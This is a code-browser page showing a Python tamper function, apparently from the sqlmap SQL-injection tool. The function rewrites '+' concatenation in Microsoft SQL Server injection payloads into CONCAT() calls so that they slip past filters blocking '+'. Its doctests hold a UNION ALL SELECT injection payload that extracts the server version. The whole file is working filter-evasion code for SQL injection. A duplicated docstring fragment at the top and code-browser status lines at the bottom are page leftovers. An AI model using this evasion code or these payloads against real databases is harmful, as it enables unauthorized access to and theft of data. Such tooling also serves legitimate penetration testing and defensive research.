Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart Tested against: * Microsoft SQL Server 2012 Requirements: * Microsoft SQL Server 2012+ Notes: * Useful in case ('+') character is filtered >>> tamper('SELECT CHAR(113)+CHAR(114)+C
(payload, **kwargs)
| 19 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) |
| 20 | |
| 21 | def tamper(payload, **kwargs): |
| 22 | """ |
| 23 | Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart |
| 24 | |
| 25 | Tested against: |
| 26 | * Microsoft SQL Server 2012 |
| 27 | |
| 28 | Requirements: |
| 29 | * Microsoft SQL Server 2012+ |
| 30 | |
| 31 | Notes: |
| 32 | * Useful in case ('+') character is filtered |
| 33 | |
| 34 | >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') |
| 35 | 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' |
| 36 | |
| 37 | >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe') |
| 38 | '1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe' |
| 39 | """ |
| 40 | |
| 41 | retVal = payload |
| 42 | |
| 43 | if payload: |
| 44 | match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) |
| 45 | if match: |
| 46 | part = match.group(0) |
| 47 | |
| 48 | chars = [char for char in part] |
| 49 | for index in zeroDepthSearch(part, '+'): |
| 50 | chars[index] = ',' |
| 51 | |
| 52 | replacement = "CONCAT(%s)" % "".join(chars) |
| 53 | retVal = retVal.replace(part, replacement) |
| 54 | |
| 55 | return retVal |
nothing calls this directly
no test coverage detected
searching dependent graphs…